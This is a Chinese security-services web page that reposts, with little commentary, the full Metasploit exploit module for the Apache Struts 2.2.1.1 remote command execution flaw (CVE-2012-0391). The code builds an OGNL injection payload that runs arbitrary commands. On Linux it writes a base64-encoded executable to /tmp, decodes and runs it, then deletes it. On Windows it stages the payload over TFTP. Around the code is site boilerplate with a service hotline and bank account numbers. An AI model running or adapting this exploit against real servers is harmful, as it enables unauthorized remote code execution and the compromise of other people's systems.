Apache Struts 2.2.1.1远程命令执行漏洞_安全漏洞聚焦_龙虎鹰师网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

Apache Struts 2.2.1.1远程命令执行漏洞

作者:龙虎鹰师网安Apache教程网 来源:龙虎鹰师网安Apache教程网 浏览次数:0

本篇关键词:Apache
龙虎鹰师网安网讯:Apache Struts最新漏洞公布:Apache Struts 2.2.1.1远程命令执行漏洞(Apache Struts

################################################################

# This file is part of the Metasploit Framework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit 

# web site for more information on licensing and terms of use. 

#  http://metasploit.com/ 

################################################################ 

  
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote 

    Rank = ExcellentRanking 

  

    include Msf::Exploit::CmdStagerTFTP 

    include Msf::Exploit::Remote::HttpClient 

  

    def initialize(info = {}) 

        super(update_info(info, 

            'Name'           => 'Apache Struts <= 2.2.1.1 Remote Command Execution', 

            'Description'    => %q{ 

                    This module exploits a remote command execution vulnerability in

                Apache Struts versions < 2.2.1.1. This issue is caused because the 

                ExceptionDelegator interprets parameter values as OGNL expressions 

                during certain exception handling for mismatched data types of properties, 

                which allows remote attackers to execute arbitrary Java code via a 

                crafted parameter. 

            }, 

            'Author'         => 

                [ 

                    'Johannes Dahse', # Vulnerability discovery and PoC 

                    'Andreas Nusser', # Vulnerability discovery and PoC 

                    'juan vazquez', # Metasploit module 

                    'sinn3r' # Metasploit module 

                ], 

            'License'        => MSF_LICENSE, 

            'Version'        => '$Revision: $', 

            'References'     => 

                [ 

                    [ 'CVE', '2012-0391'], 

                    [ 'OSVDB', '78277'], 

                    [ 'EDB', '18329'], 

                    [ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] 

                ], 

            'Platform'      => [ 'win', 'linux'], 

            'Privileged'     => true, 

            'Targets'        => 

                [ 

                    ['Windows Universal', 

                        { 

                                'Arch' => ARCH_X86, 

                                'Platform' => 'win'

                        } 

                    ], 

                    ['Linux Universal', 

                        { 

                                'Arch' => ARCH_X86, 

                                'Platform' => 'linux'

                        } 

                    ], 

                ], 

            'DisclosureDate' => 'Jan 06 2012', 

            'DefaultTarget' => 0)) 

  

            register_options( 

                [ 

                    Opt::RPORT(8080), 

                    OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]), 

                    OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]) 

                ], self.class) 

    end

   def execute_command(cmd, opts = {}) 

  

        uri = String.new(datastore['TARGETURI']) 

        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'

        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'

        uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) 

  

        vprint_status("Attempting to execute: #{cmd}") 

  

        resp = send_request_raw({ 

            'uri'     => uri, 

            'version' => '1.1', 

            'method'  => 'GET', 

        }, 5) 

   end

   def windows_stager 

        exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

  

        print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") 

        execute_cmdstager({ :temp => '.'}) 

        @payload_exe = payload_exe 

  

        print_status("Attempting to execute the payload...") 

        execute_command(@payload_exe) 

    end

   def linux_stager 

        cmds = "/bin/sh@-c@echo LINE | tee FILE"

        exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) 

        base64 = Rex::Text.encode_base64(exe) 

        base64.gsub!(/\=/, "\\u003d") 

        file = rand_text_alphanumeric(4+rand(4)) 

  

        execute_command("/bin/sh@-c@touch /tmp/#{file}.b64") 

        cmds.gsub!(/FILE/, "/tmp/" + file + ".b64") 

        base64.each_line do |line| 

            line.chomp! 

            cmd = cmds 

            cmd.gsub!(/LINE/, line) 

            execute_command(cmds) 

        end

  

        execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}") 

        execute_command("/bin/sh@-c@chmod +x /tmp/#{file}") 

        execute_command("/bin/sh@-c@rm /tmp/#{file}.b64") 

  

        execute_command("/bin/sh@-c@/tmp/#{file}") 

        @payload_exe = "/tmp/" + file 

    end

   def on_new_session(client) 

        if target['Platform'] == 'linux'

            print_status("Deleting #{@payload_exe} payload file") 

            execute_command("/bin/sh@-c@rm #{@payload_exe}") 

        else

            print_status("Windows does not allow running executables to be deleted") 

            print_status("Delete the #{@payload_exe} file manually after migrating") 

        end

    end

   def exploit 

        if not datastore['CMD'].empty? 

            print_status("Executing user supplied command") 

            execute_command(datastore['CMD']) 

            return

        end

  

        case target['Platform'] 

            when 'linux'

                linux_stager 

            when 'win'

                windows_stager 

            else

                raise RuntimeError, 'Unsupported target platform!'

        end

  

        handler 

    end

end

    龙虎鹰师网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-17260-1.html
网站维护教程更新时间:2012-09-12 00:12:48  【打印此页】  【关闭
全站连接N点 | 龙虎鹰师网安 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。龙虎鹰师网安服务器维护基地招商进行中!请致电24小时热线: 13910257075 王先生
  开户名:王俊鹏 开户行:招商银行清华园支行:9555500101708872 建设银行清华园分行 6227000014970239251 

footer  footer  互联网安全  footer